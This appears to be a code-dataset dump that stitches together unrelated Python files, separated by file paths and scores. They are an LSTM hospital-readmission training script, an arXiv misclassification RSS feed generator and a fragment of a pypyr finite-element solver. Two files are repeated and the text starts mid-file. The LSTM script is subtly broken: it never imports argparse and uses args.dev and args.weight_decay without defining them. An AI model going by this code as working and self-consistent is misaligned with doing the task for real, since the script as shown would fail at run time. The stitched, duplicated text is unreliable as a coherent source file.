nn.Linear(self.lstm_units, int(self.lstm_units / 2.0)),
nn.ReLU(),
nn.Dropout(p=self.drop_rate),
nn.Linear(int(self.lstm_units / 2.0), 1)
)
def forward(self, jny, hid_init):
# embedding
jny_embed = self.embedding(jny)
# LSTM
x, _ = self.lstm(jny_embed, hid_init) # dim of x is (Batch, len, feat)
(x, _) = torch.max(x, dim=1)
return self.fc(x)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--seed', type=int, default=1986,
help='global random seed number')
parser.add_argument('--epochs', type=int, default=20,
help='number of epochs of training')
parser.add_argument('--lr', type=float, default=1e-4,
help='learning rate')
parser.add_argument('--drop-rate', type=float, default=0.5,
help='dropout rate')
parser.add_argument('--clip', type=float, default=0.25)
parser.add_argument('--embed-dim', type=int, default=128)
parser.add_argument('--lstm-layers', type=int, default=2)
parser.add_argument('--lstm-units', type=int, default=256)
parser.add_argument('--batch-size', type=int, default=64)
parser.add_argument('--log-interval', type=int, default=100)
parser.add_argument('--embedding', type=int, default=0, help='0: me2vec; 1: metapath2vec; 2: node2vec; 3: word2vec; 4: random initialization.')
parser.add_argument('--checkpoint', dest='checkpoint', action='store_true')
parser.set_defaults(weighted=True)
return parser.parse_args()
def set_rnd_seed(seed):
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
def load_emb(ppd_path):
ppd_emb = np.loadtxt(ppd_path, skiprows=1)
ppd_coor = np.array([x[1:] for x in ppd_emb])
ppd_id = [int(x[0]) for x in ppd_emb]
svc_emb = ppd_coor[np.argsort(ppd_id), :]
return np.sort(ppd_id), svc_emb
def train(epoch, model, optimizer, args, padded_jny, pat_lbls):
'''
padded_jny: padded and tokenized patient journey
jny_lens: lengths of each patient's journey
pat_lbls: binary outcome of each patient
'''
# set the model in train mode
model.train()
train_loss = 0
idx_list = list(BatchSampler(RandomSampler(range(len(padded_jny))), args.batch_size, drop_last=False))
padded_jny_ts = torch.tensor(padded_jny, device=args.dev, dtype=torch.long)
pat_lbls_ts = torch.tensor(pat_lbls, device=args.dev, dtype=torch.float)
for i in range(len(idx_list)):
# load current batch into tensor
cur_batch_jnys = padded_jny_ts[idx_list[i]]
cur_batch_lbls = pat_lbls_ts[idx_list[i]]
# train model
h_0 = torch.randn(args.lstm_layers, len(cur_batch_jnys), args.lstm_units, device=args.dev)
c_0 = torch.randn(args.lstm_layers, len(cur_batch_jnys), args.lstm_units, device=args.dev)
optimizer.zero_grad()
y_pred = model(cur_batch_jnys, (h_0, c_0)).squeeze()
loss = F.binary_cross_entropy_with_logits(y_pred, cur_batch_lbls)
train_loss += loss.item() * len(cur_batch_jnys)
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), args.clip)
optimizer.step()
# display running loss
if i % args.log_interval == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.4f}'.format(
epoch, (i + 1) * args.batch_size, len(padded_jny),
100. * (i + 1) * args.batch_size / len(padded_jny), loss.item()))
train_loss /= len(padded_jny)
print('Average train loss of epoch {} is {:.4f}.'.format(epoch, train_loss))
return train_loss
def test(epoch, model, args, padded_jny, pat_lbls):
# set the mode in testing mode
model.eval()
test_loss = 0
idx_list = list(BatchSampler(SequentialSampler(range(len(padded_jny))), args.batch_size, drop_last=False))
padded_jny_ts = torch.tensor(padded_jny, device=args.dev, dtype=torch.long)
pat_lbls_ts = torch.tensor(pat_lbls, device=args.dev, dtype=torch.float)
y_pred_total = torch.zeros(1,)
with torch.no_grad():
for i in range(len(idx_list)):
# load current batch into tensor
cur_batch_jnys = padded_jny_ts[idx_list[i]]
cur_batch_lbls = pat_lbls_ts[idx_list[i]]
# test model
h_0 = torch.randn(args.lstm_layers, len(cur_batch_jnys), args.lstm_units, device=args.dev)
c_0 = torch.randn(args.lstm_layers, len(cur_batch_jnys), args.lstm_units, device=args.dev)
y_pred = model(cur_batch_jnys, (h_0, c_0)).squeeze()
y_pred_total = torch.cat((y_pred_total, torch.sigmoid(y_pred).detach().cpu()))
loss = F.binary_cross_entropy_with_logits(y_pred, cur_batch_lbls)
test_loss += loss.item() * len(cur_batch_jnys)
test_loss /= len(padded_jny)
print('Average test loss of epoch {} is {:.4f}.'.format(epoch, test_loss))
return y_pred_total[1:].numpy(), test_loss
def save_best_model(model, PATH):
torch.save({'model_state_dict': model.state_dict()}, PATH)
def main(args):
med_seq = pd.read_parquet('saved_data/pat_seq_readmission_v2.parquet')
data_jny_np = np.stack(med_seq.seq.values, axis=0)
labels = med_seq.readmission.values
svc_dict = pd.read_csv('saved_data/svc_dict.csv')
svc_dict = dict(zip(svc_dict['PPD name'], svc_dict['svc_id']))
svc_dict['<PAD>'] = 3157
if args.embedding == 0:
svc_emb = PickleUtils.loader('saved_data/svc_emb.pkl')
elif args.embedding == 1:
svc_emb = PickleUtils.loader('saved_data/baseline/pat_metapath_emb.pkl')
svc_emb = svc_emb[141666:(141666 + 3157)]
elif args.embedding == 2:
svc_emb = PickleUtils.loader('saved_data/baseline/pat_node2vec_emb.pkl')
svc_emb = svc_emb[141666:(141666 + 3157)]
svc_id = np.asarray(list(range(3157)))
svc_emb_ts = torch.randn(len(svc_id)+1, args.embed_dim, dtype=torch.float)
svc_emb_ts[-1] = torch.zeros(args.embed_dim, dtype=torch.float)
svc_emb_ts[svc_id] = torch.FloatTensor(svc_emb)
pr_logs = np.zeros((2, 10))
skf = StratifiedShuffleSplit(train_size=0.8, random_state=0, n_splits=10)
for fold_idx, (train_idx, test_idx) in enumerate(skf.split(data_jny_np, labels)):
print('=' * 70)
print('Fold={}'.format(fold_idx))
# data split
train_jny_np = data_jny_np[train_idx]
train_labels = labels[train_idx]
test_jny_np = data_jny_np[test_idx]
test_labels = labels[test_idx]
ss = StratifiedShuffleSplit(train_size=0.5)
ii = next(ss.split(test_jny_np, test_labels))
val_jny_np = test_jny_np[ii[0]]
val_labels = test_labels[ii[0]]
test_jny_np = test_jny_np[ii[1]]
test_labels = test_labels[ii[1]]
train_jny_list = train_jny_np.tolist()
# train model (with pretrained emb)
set_rnd_seed(1986)
model = VanillaLSTM(
vocab=svc_dict,
lstm_layers=args.lstm_layers,
lstm_units=args.lstm_units,
embed_dim=args.embed_dim,
drop_rate=args.drop_rate
)
if args.embedding == 3:
# train word2vec embedding
walks = [list(map(str, walk)) for walk in train_jny_list]
wv_model = Word2Vec(walks, size=args.embed_dim, window=20, min_count=0, sg=1,
workers=8, iter=150)
wv_model.wv.save_word2vec_format('saved_data/baseline/wv2.emd')
svc_id, svc_emb = load_emb('saved_data/baseline/wv2.emd')
svc_emb_ts = torch.randn(len(svc_dict), args.embed_dim, dtype=torch.float)
svc_emb_ts[-1] = torch.zeros(args.embed_dim, dtype=torch.float)
svc_emb_ts[svc_id] = torch.FloatTensor(svc_emb)
if args.embedding != 4:
model.embedding = nn.Embedding.from_pretrained(svc_emb_ts, freeze=False)
model = model.to(args.dev)
opt = optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.weight_decay)
best_pr = 0
for epoch in range(1, args.epochs + 1):
train_loss = train(epoch, model, opt, args, train_jny_np, train_labels)
y_pred, val_loss = test(epoch, model, args, val_jny_np, val_labels)
pr_auc = average_precision_score(val_labels, y_pred, average='micro')
if pr_auc > best_pr:
best_pr = pr_auc
save_best_model(model, 'saved_models/best_pretrain_sequential')
print('PR AUC of epoch {} is {:.4f}.\n'.format(epoch, pr_auc))
# load model and evaluate on the test set
checkpoint = torch.load('saved_models/best_pretrain_sequential')
model.load_state_dict(checkpoint['model_state_dict'])
y_pred, _ = test(1, model, args, test_jny_np, test_labels)
pr_logs[0, fold_idx] = average_precision_score(test_labels, y_pred, average='micro')
pr_logs[1, fold_idx] = roc_auc_score(test_labels, y_pred, average='micro')
print(pr_logs)
if __name__ == "__main__":
args = parse_args()
main(args) | experiments/sequential_learning_finetune.py | import random
import pandas as pd
import numpy as np
from tqdm import tqdm
import datetime as dt
from itertools import combinations
import matplotlib.pyplot as plt
import collections
from sklearn.model_selection import StratifiedShuffleSplit, StratifiedKFold
from sklearn.metrics import average_precision_score, f1_score, roc_auc_score
from gensim.models import Word2Vec
from src.utils import PickleUtils
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import BatchSampler, RandomSampler, SequentialSampler
dev = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class VanillaLSTM(nn.Module):
def __init__(self, vocab, lstm_layers, lstm_units, embed_dim, drop_rate):
super(VanillaLSTM, self).__init__()
# initializatioin
self.vocab = vocab
self.lstm_layers = lstm_layers
self.lstm_units = lstm_units
self.embed_dim = embed_dim
self.drop_rate = drop_rate
# embedding layer
vocab_size = len(self.vocab)
padding_idx = self.vocab['<PAD>']
self.embedding = nn.Embedding(
num_embeddings=vocab_size,
embedding_dim=self.embed_dim,
padding_idx=padding_idx
)
# LSTM
self.lstm = nn.LSTM(
input_size=self.embed_dim,
hidden_size=self.lstm_units,
num_layers=self.lstm_layers,
batch_first=True,
dropout=self.drop_rate
)
self.fc = nn.Sequential(
nn.Linear(self.lstm_units, int(self.lstm_units / 2.0)),
nn.ReLU(),
nn.Dropout(p=self.drop_rate),
nn.Linear(int(self.lstm_units / 2.0), 1)
)
def forward(self, jny, hid_init):
# embedding
jny_embed = self.embedding(jny)
# LSTM
x, _ = self.lstm(jny_embed, hid_init) # dim of x is (Batch, len, feat)
(x, _) = torch.max(x, dim=1)
return self.fc(x)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--seed', type=int, default=1986,
help='global random seed number')
parser.add_argument('--epochs', type=int, default=20,
help='number of epochs of training')
parser.add_argument('--lr', type=float, default=1e-4,
help='learning rate')
parser.add_argument('--drop-rate', type=float, default=0.5,
help='dropout rate')
parser.add_argument('--clip', type=float, default=0.25)
parser.add_argument('--embed-dim', type=int, default=128)
parser.add_argument('--lstm-layers', type=int, default=2)
parser.add_argument('--lstm-units', type=int, default=256)
parser.add_argument('--batch-size', type=int, default=64)
parser.add_argument('--log-interval', type=int, default=100)
parser.add_argument('--embedding', type=int, default=0, help='0: me2vec; 1: metapath2vec; 2: node2vec; 3: word2vec; 4: random initialization.')
parser.add_argument('--checkpoint', dest='checkpoint', action='store_true')
parser.set_defaults(weighted=True)
return parser.parse_args()
def set_rnd_seed(seed):
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
def load_emb(ppd_path):
ppd_emb = np.loadtxt(ppd_path, skiprows=1)
ppd_coor = np.array([x[1:] for x in ppd_emb])
ppd_id = [int(x[0]) for x in ppd_emb]
svc_emb = ppd_coor[np.argsort(ppd_id), :]
return np.sort(ppd_id), svc_emb
def train(epoch, model, optimizer, args, padded_jny, pat_lbls):
'''
padded_jny: padded and tokenized patient journey
jny_lens: lengths of each patient's journey
pat_lbls: binary outcome of each patient
'''
# set the model in train mode
model.train()
train_loss = 0
idx_list = list(BatchSampler(RandomSampler(range(len(padded_jny))), args.batch_size, drop_last=False))
padded_jny_ts = torch.tensor(padded_jny, device=args.dev, dtype=torch.long)
pat_lbls_ts = torch.tensor(pat_lbls, device=args.dev, dtype=torch.float)
for i in range(len(idx_list)):
# load current batch into tensor
cur_batch_jnys = padded_jny_ts[idx_list[i]]
cur_batch_lbls = pat_lbls_ts[idx_list[i]]
# train model
h_0 = torch.randn(args.lstm_layers, len(cur_batch_jnys), args.lstm_units, device=args.dev)
c_0 = torch.randn(args.lstm_layers, len(cur_batch_jnys), args.lstm_units, device=args.dev)
optimizer.zero_grad()
y_pred = model(cur_batch_jnys, (h_0, c_0)).squeeze()
loss = F.binary_cross_entropy_with_logits(y_pred, cur_batch_lbls)
train_loss += loss.item() * len(cur_batch_jnys)
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), args.clip)
optimizer.step()
# display running loss
if i % args.log_interval == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.4f}'.format(
epoch, (i + 1) * args.batch_size, len(padded_jny),
100. * (i + 1) * args.batch_size / len(padded_jny), loss.item()))
train_loss /= len(padded_jny)
print('Average train loss of epoch {} is {:.4f}.'.format(epoch, train_loss))
return train_loss
def test(epoch, model, args, padded_jny, pat_lbls):
# set the mode in testing mode
model.eval()
test_loss = 0
idx_list = list(BatchSampler(SequentialSampler(range(len(padded_jny))), args.batch_size, drop_last=False))
padded_jny_ts = torch.tensor(padded_jny, device=args.dev, dtype=torch.long)
pat_lbls_ts = torch.tensor(pat_lbls, device=args.dev, dtype=torch.float)
y_pred_total = torch.zeros(1,)
with torch.no_grad():
for i in range(len(idx_list)):
# load current batch into tensor
cur_batch_jnys = padded_jny_ts[idx_list[i]]
cur_batch_lbls = pat_lbls_ts[idx_list[i]]
# test model
h_0 = torch.randn(args.lstm_layers, len(cur_batch_jnys), args.lstm_units, device=args.dev)
c_0 = torch.randn(args.lstm_layers, len(cur_batch_jnys), args.lstm_units, device=args.dev)
y_pred = model(cur_batch_jnys, (h_0, c_0)).squeeze()
y_pred_total = torch.cat((y_pred_total, torch.sigmoid(y_pred).detach().cpu()))
loss = F.binary_cross_entropy_with_logits(y_pred, cur_batch_lbls)
test_loss += loss.item() * len(cur_batch_jnys)
test_loss /= len(padded_jny)
print('Average test loss of epoch {} is {:.4f}.'.format(epoch, test_loss))
return y_pred_total[1:].numpy(), test_loss
def save_best_model(model, PATH):
torch.save({'model_state_dict': model.state_dict()}, PATH)
def main(args):
med_seq = pd.read_parquet('saved_data/pat_seq_readmission_v2.parquet')
data_jny_np = np.stack(med_seq.seq.values, axis=0)
labels = med_seq.readmission.values
svc_dict = pd.read_csv('saved_data/svc_dict.csv')
svc_dict = dict(zip(svc_dict['PPD name'], svc_dict['svc_id']))
svc_dict['<PAD>'] = 3157
if args.embedding == 0:
svc_emb = PickleUtils.loader('saved_data/svc_emb.pkl')
elif args.embedding == 1:
svc_emb = PickleUtils.loader('saved_data/baseline/pat_metapath_emb.pkl')
svc_emb = svc_emb[141666:(141666 + 3157)]
elif args.embedding == 2:
svc_emb = PickleUtils.loader('saved_data/baseline/pat_node2vec_emb.pkl')
svc_emb = svc_emb[141666:(141666 + 3157)]
svc_id = np.asarray(list(range(3157)))
svc_emb_ts = torch.randn(len(svc_id)+1, args.embed_dim, dtype=torch.float)
svc_emb_ts[-1] = torch.zeros(args.embed_dim, dtype=torch.float)
svc_emb_ts[svc_id] = torch.FloatTensor(svc_emb)
pr_logs = np.zeros((2, 10))
skf = StratifiedShuffleSplit(train_size=0.8, random_state=0, n_splits=10)
for fold_idx, (train_idx, test_idx) in enumerate(skf.split(data_jny_np, labels)):
print('=' * 70)
print('Fold={}'.format(fold_idx))
# data split
train_jny_np = data_jny_np[train_idx]
train_labels = labels[train_idx]
test_jny_np = data_jny_np[test_idx]
test_labels = labels[test_idx]
ss = StratifiedShuffleSplit(train_size=0.5)
ii = next(ss.split(test_jny_np, test_labels))
val_jny_np = test_jny_np[ii[0]]
val_labels = test_labels[ii[0]]
test_jny_np = test_jny_np[ii[1]]
test_labels = test_labels[ii[1]]
train_jny_list = train_jny_np.tolist()
# train model (with pretrained emb)
set_rnd_seed(1986)
model = VanillaLSTM(
vocab=svc_dict,
lstm_layers=args.lstm_layers,
lstm_units=args.lstm_units,
embed_dim=args.embed_dim,
drop_rate=args.drop_rate
)
if args.embedding == 3:
# train word2vec embedding
walks = [list(map(str, walk)) for walk in train_jny_list]
wv_model = Word2Vec(walks, size=args.embed_dim, window=20, min_count=0, sg=1,
workers=8, iter=150)
wv_model.wv.save_word2vec_format('saved_data/baseline/wv2.emd')
svc_id, svc_emb = load_emb('saved_data/baseline/wv2.emd')
svc_emb_ts = torch.randn(len(svc_dict), args.embed_dim, dtype=torch.float)
svc_emb_ts[-1] = torch.zeros(args.embed_dim, dtype=torch.float)
svc_emb_ts[svc_id] = torch.FloatTensor(svc_emb)
if args.embedding != 4:
model.embedding = nn.Embedding.from_pretrained(svc_emb_ts, freeze=False)
model = model.to(args.dev)
opt = optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.weight_decay)
best_pr = 0
for epoch in range(1, args.epochs + 1):
train_loss = train(epoch, model, opt, args, train_jny_np, train_labels)
y_pred, val_loss = test(epoch, model, args, val_jny_np, val_labels)
pr_auc = average_precision_score(val_labels, y_pred, average='micro')
if pr_auc > best_pr:
best_pr = pr_auc
save_best_model(model, 'saved_models/best_pretrain_sequential')
print('PR AUC of epoch {} is {:.4f}.\n'.format(epoch, pr_auc))
# load model and evaluate on the test set
checkpoint = torch.load('saved_models/best_pretrain_sequential')
model.load_state_dict(checkpoint['model_state_dict'])
y_pred, _ = test(1, model, args, test_jny_np, test_labels)
pr_logs[0, fold_idx] = average_precision_score(test_labels, y_pred, average='micro')
pr_logs[1, fold_idx] = roc_auc_score(test_labels, y_pred, average='micro')
print(pr_logs)
if __name__ == "__main__":
args = parse_args()
main(args) | 0.874614 | 0.177205 |
import logging
import os
import subprocess
import xml.etree.ElementTree as ET
from datetime import datetime
from glob import glob
import feedgenerator
import requests
from scipy.special import softmax
logging.basicConfig()
log = logging.getLogger(__name__)
def main():
harvest_since_last_modification()
entries = list(iter_load_entries_from_xml())
if not entries:
log.error("No new entries, is it the weekend?")
return
texts = [
single_line(entry["title"] + " abstract: " + entry["abstract"])
for entry in entries
]
model = load_model()
entries = (
*model.predict(texts),
texts,
entries,
) # prediction label, score, arxiv text, arxiv label
feed = feedgenerator.Rss201rev2Feed(
title="arXiv misclassified: all",
link="http://export.arxiv.org/rss/",
description="Papers from arXiv that should be classifed cs.SE according to our model.",
language="en",
)
sub_categories = ("cs.AI", "cs.LG", "stat.ML")
sub_categories_str = " ".join(sub_categories)
feed_sub = feedgenerator.Rss201rev2Feed(
title="arXiv misclassified: " + sub_categories_str,
link="http://export.arxiv.org/rss/",
description="Papers from "
+ sub_categories_str
+ " that should be classifed cs.SE according to our model.",
language="en",
)
for pred, score, text, entry in zip(*entries):
label = entry["categories"]
if pred and "cs.se" not in label.lower() and "cs.pl" not in label.lower():
abs_link = entry["link"]
abstract = entry["abstract"]
authors = entry["authors"]
pdf_link = abs_link.replace("/abs/", "/pdf/")
score = softmax(score)
title = entry["title"]
r = requests.get(abs_link)
if r.ok:
description = r.text
else:
description = f"""
{abstract}
<p>Authors: {authors}
<p><a href="{pdf_link}">{pdf_link}</a>
<p><a href="{abs_link}">{abs_link}</a>
<p>Categories: {label}
<p>score: {score[1]:.2f}
""".strip()
args = dict(
title=title,
link=pdf_link,
description=description,
unique_id=pdf_link,
categories=label.split(),
)
feed.add_item(**args)
if any(sub in label for sub in sub_categories):
feed_sub.add_item(**args)
os.makedirs("feed", exist_ok=True)
with open("feed/feed.xml", "w") as f:
print(feed.writeString("utf-8"), file=f)
with open("feed/feed2.xml", "w") as f:
print(feed_sub.writeString("utf-8"), file=f)
def harvest_since_last_modification():
try:
date = datetime.fromtimestamp(os.stat("feed/feed.xml").st_mtime)
except OSError:
log.exception("Got OSError when trying to stat feed file:")
date = datetime.today()
date = date.strftime("%Y-%m-%d")
log.info("Harvesting since %s", date)
subprocess.run(
f"rm -rf data && mkdir data && cd data && oai-harvest 'http://export.arxiv.org/oai2' --from {date} -p arXiv",
check=True,
shell=True,
)
def iter_load_entries_from_xml():
tags = ("abstract", "authors", "categories", "id", "title")
for fname in glob("data/*.xml"):
root = ET.parse(fname).getroot()
d = {}
for el in root:
tag = el.tag
for wanted_tag in tags:
if tag.endswith(wanted_tag):
d[wanted_tag] = el_text(el)
if all(tag in d for tag in tags): # Sanity check: valid entry
d["link"] = f"https://arxiv.org/abs/{d['id']}"
yield d
else:
log.warning(
"File %s is not complete, contains keys: %s", fname, list(d.keys())
)
def el_text(el):
if not el.tag.endswith("authors"):
return el.text.strip()
return " - ".join(author_names_text(el))
def author_names_text(el):
for child in el:
yield " ".join(child.itertext())
def single_line(s):
return " ".join(s.split())
def load_model():
from simpletransformers.classification import ClassificationModel
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
log.debug("Loading ClassificationModel")
return ClassificationModel(
"roberta",
"outputs/",
use_cuda=False,
args={"train_batch_size": 64, "eval_batch_size": 64, "process_count": 8},
)
if __name__ == "__main__":
main() | fetch.py | import logging
import os
import subprocess
import xml.etree.ElementTree as ET
from datetime import datetime
from glob import glob
import feedgenerator
import requests
from scipy.special import softmax
logging.basicConfig()
log = logging.getLogger(__name__)
def main():
harvest_since_last_modification()
entries = list(iter_load_entries_from_xml())
if not entries:
log.error("No new entries, is it the weekend?")
return
texts = [
single_line(entry["title"] + " abstract: " + entry["abstract"])
for entry in entries
]
model = load_model()
entries = (
*model.predict(texts),
texts,
entries,
) # prediction label, score, arxiv text, arxiv label
feed = feedgenerator.Rss201rev2Feed(
title="arXiv misclassified: all",
link="http://export.arxiv.org/rss/",
description="Papers from arXiv that should be classifed cs.SE according to our model.",
language="en",
)
sub_categories = ("cs.AI", "cs.LG", "stat.ML")
sub_categories_str = " ".join(sub_categories)
feed_sub = feedgenerator.Rss201rev2Feed(
title="arXiv misclassified: " + sub_categories_str,
link="http://export.arxiv.org/rss/",
description="Papers from "
+ sub_categories_str
+ " that should be classifed cs.SE according to our model.",
language="en",
)
for pred, score, text, entry in zip(*entries):
label = entry["categories"]
if pred and "cs.se" not in label.lower() and "cs.pl" not in label.lower():
abs_link = entry["link"]
abstract = entry["abstract"]
authors = entry["authors"]
pdf_link = abs_link.replace("/abs/", "/pdf/")
score = softmax(score)
title = entry["title"]
r = requests.get(abs_link)
if r.ok:
description = r.text
else:
description = f"""
{abstract}
<p>Authors: {authors}
<p><a href="{pdf_link}">{pdf_link}</a>
<p><a href="{abs_link}">{abs_link}</a>
<p>Categories: {label}
<p>score: {score[1]:.2f}
""".strip()
args = dict(
title=title,
link=pdf_link,
description=description,
unique_id=pdf_link,
categories=label.split(),
)
feed.add_item(**args)
if any(sub in label for sub in sub_categories):
feed_sub.add_item(**args)
os.makedirs("feed", exist_ok=True)
with open("feed/feed.xml", "w") as f:
print(feed.writeString("utf-8"), file=f)
with open("feed/feed2.xml", "w") as f:
print(feed_sub.writeString("utf-8"), file=f)
def harvest_since_last_modification():
try:
date = datetime.fromtimestamp(os.stat("feed/feed.xml").st_mtime)
except OSError:
log.exception("Got OSError when trying to stat feed file:")
date = datetime.today()
date = date.strftime("%Y-%m-%d")
log.info("Harvesting since %s", date)
subprocess.run(
f"rm -rf data && mkdir data && cd data && oai-harvest 'http://export.arxiv.org/oai2' --from {date} -p arXiv",
check=True,
shell=True,
)
def iter_load_entries_from_xml():
tags = ("abstract", "authors", "categories", "id", "title")
for fname in glob("data/*.xml"):
root = ET.parse(fname).getroot()
d = {}
for el in root:
tag = el.tag
for wanted_tag in tags:
if tag.endswith(wanted_tag):
d[wanted_tag] = el_text(el)
if all(tag in d for tag in tags): # Sanity check: valid entry
d["link"] = f"https://arxiv.org/abs/{d['id']}"
yield d
else:
log.warning(
"File %s is not complete, contains keys: %s", fname, list(d.keys())
)
def el_text(el):
if not el.tag.endswith("authors"):
return el.text.strip()
return " - ".join(author_names_text(el))
def author_names_text(el):
for child in el:
yield " ".join(child.itertext())
def single_line(s):
return " ".join(s.split())
def load_model():
from simpletransformers.classification import ClassificationModel
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
log.debug("Loading ClassificationModel")
return ClassificationModel(
"roberta",
"outputs/",
use_cuda=False,
args={"train_batch_size": 64, "eval_batch_size": 64, "process_count": 8},
)
if __name__ == "__main__":
main() | 0.39946 | 0.162712 |
import numpy
from pypyr.mesh import Basis, ElementFinder, ElementQuadrature, BoundaryQuadrature
import itertools as it
from pypyr.timing import *
def processIndices(basis, boundarytags):
""" Given a basis (a collection of elements) and a set of boundaries, extract the internal and external degrees of freedom
returns:
I: a sparse matrix that maps each the local degrees of freedom for each element to their global indices
boundaries: a map of tag->DegreeSet, which can be used to evaluate all the degrees on each boundary
internalidx: ids of the internal degrees of freedom
"""
import scipy.sparse as ss
indices = basis.getIndices()
n = basis.elementfactory.index # = max(indices)+1
I = ss.csr_matrix((numpy.ones_like(indices), indices, range(0,len(indices)+1)))
idxflag = numpy.ones(n, dtype=bool)
boundaries = {}
for tag in boundarytags:
bdy = basis.getBoundary(tag)
boundaries[tag] = bdy
if bdy: idxflag[bdy.indices] = False
internalidx = numpy.nonzero(idxflag)[0]
return I, boundaries, internalidx
def blockInnerProducts(quadweights, leftvalsiter, rightvalsiter, leftI, rightI):
""" Evaluate the inner product matrix
returns a sparse matrix equal to leftI.transpose * L.transpose * quadweights * R * rightI
where L and R are block diagonal matrices whose blocks are given by the iterables, leftvalsiter and rightvalsiter
If the left or right vals have more than 2 dimensions, the extra dimensions are multiplied and summed (tensor-contracted),
with broadcasting as necessary, i,e, this is an inner-product - it can't be used for a more general multiplication'
"""
import scipy.sparse as ss
data = []
idx = []
ip = [0]
for e, (leftvals, rightvals, weights) in enumerate(it.izip(leftvalsiter, rightvalsiter, quadweights)):
if len(weights):
lvs = len(leftvals.shape)
rvs = len(rightvals.shape)
vs = max(lvs,rvs)
leftvals = leftvals.reshape(leftvals.shape + (1,)*(vs - lvs))
rightvals = rightvals.reshape(rightvals.shape + (1,)*(vs - rvs))
lvw = leftvals * weights.reshape((-1,) + (1,)*(vs-1))
# print lvw.shape, rightvals.shape
data.append(numpy.tensordot(lvw, rightvals, ([0]+range(2,vs), [0]+range(2,vs))))
idx.append(e)
ip.append(len(idx))
# print e, idx, ip
V = ss.bsr_matrix((data, idx, ip),dtype=float, shape=(leftI.shape[0],rightI.shape[0]))
return leftI.transpose() * V * rightI
class System(object):
""" A System contains everything that's need to construct stiffness matrices and load vectors.
This is an abstract-ish class see SymmetricSystem and AsymmetricSystem for concrete implementations.
Parameters:
quadrule: a tuple of quadrature points and weights on the reference pyramid
meshevents: A function that produces mesh events
leftbasis, rightbasis: see pypyr.mesh.Basis
leftindexinfo, rightindexinfo: see processIndices
"""
def __init__(self, quadrule, meshevents, leftbasis, rightbasis, leftindexinfo, rightindexinfo):
self.elementfinder = meshevents(ElementFinder())
self.elementinfo = meshevents(ElementQuadrature())
self.boundaryquad = meshevents(BoundaryQuadrature())
self.refquadpoints, refweights = quadrule
self.quadweights = list(self.elementinfo.getWeights(self.refquadpoints, refweights))
self.leftbasis = leftbasis
self.rightbasis = rightbasis
self.leftI, self.leftbdys, self.leftintidx = leftindexinfo
self.rightI, self.rightbdys, self.rightintidx = rightindexinfo
def _transposeinplace(self):
""" Transpose this object """
self.leftbasis, self.rightbasis = self.rightbasis, self.leftbasis
self.leftI, self.rightI = self.rightI, self.leftI
self.leftbdys, self.rightbdys = self.rightbdys, self.leftbdys
self.leftintidx, self.rightintidx = self.rightintidx, self.leftintidx
return self
def processSystem(self, leftvalsiter, rightvalsiter):
""" Construct the (non-boundary aware) stiffness matrix """
return blockInnerProducts(self.quadweights, leftvalsiter, rightvalsiter, self.leftI, self.rightI)
def processBoundary(self, sysmat, tagtog):
""" Split the stiffness matrix into the internal and external parts. Evaluate boundary data
sysmat: system matrix (which will come from processSystem()).
tagtog: dictionary of functions to evaluate on the boundar(y|ies)
returns:
internalSystem: S[I,I] where I is the internal degrees
tagtoBoundarySystem: tag->S[I,E[tag]] where E[tag] gives the indices of the external degrees
tagtogvals: g[tag] evaluated at the degrees of freedom associated with boundary "tag".
Somewhat inefficient if there's a significant proportion of dofs on the boundary """
SI = sysmat[self.leftintidx, :]
internalSystem = SI[:,self.rightintidx]
tagtogvals = {}
tagtoBoundarySystem = {}
for tag, bdy in self.rightbdys.iteritems():
tagtogvals[tag] = bdy.evaluatedofs(tagtog[tag])
tagtoBoundarySystem[tag] = SI[:,bdy.indices]
return internalSystem, tagtoBoundarySystem, tagtogvals
def loadVector(self, f, deriv=False):
""" Calculate the load vector for the internal shape functions """
testvalsiter = self.leftbasis.getElementValues(self.refquadpoints, deriv)
fvalsiter = it.imap(f, self.elementinfo.getQuadPoints(self.refquadpoints))
return blockInnerProducts(self.quadweights, testvalsiter, fvalsiter, self.leftI, numpy.ones((self.elementinfo.numElements(), 1)))[self.leftintidx,:]
def boundaryLoad(self, tagtog, squarequad, trianglequad, deriv=False):
""" Calculate the load vector based on a boundary integral, e.g. for Dirichlet data in the dual formulation of the mixed laplacian"""
tagtogsys = {}
for tag, g in tagtog.iteritems():
x,w,n = zip(*self.boundaryquad.getQuadratures(tag, squarequad, trianglequad))
# print map(g,x,n)
# print map(lambda e,p: 0 if len(p) is 0 else e.values(p), self.leftbasis.elements, x)
fvalsiter = it.imap(g, x, n)
testvalsiter = it.imap(lambda e,p: 0 if len(p) is 0 else e.values(p), self.leftbasis.elements, x)
tagtogsys[tag] = blockInnerProducts(w, testvalsiter, fvalsiter, self.leftI, numpy.ones((self.elementinfo.numElements(), 1)))[self.leftintidx,:]
return tagtogsys
def evaluate(self, points, U, tagtoG = {}, deriv=False):
""" Evaluate a solution given by the coefficients of the internal degrees, U, at specified points.
tagtoG should be the coefficients for the external degrees"""
UG = numpy.zeros(self.rightbasis.elementfactory.index)
UG[self.rightintidx] = U
for tag, G in tagtoG.iteritems():
UG[self.rightbdys[tag].indices] = G
etop = self.elementfinder.elementPointMap(points)
UGvals = numpy.zeros((len(points), self.rightbasis.elements[0].ncpts))
for e, pids in zip(self.rightbasis.elements, etop):
if len(pids):
evals = e.derivs(points[pids]) if deriv else e.values(points[pids])
UGvals[pids] += numpy.tensordot(evals, UG[e.indices], ([1],[0]))
return UGvals
class SymmetricSystem(System):
""" A symmetric system"""
def __init__(self, elements, quadrule, meshevents, boundarytags):
self.basis = Basis(elements)
meshevents(self.basis)
indexinfo = processIndices(self.basis, boundarytags)
System.__init__(self, quadrule, meshevents, self.basis, self.basis, indexinfo, indexinfo)
self.elements = elements
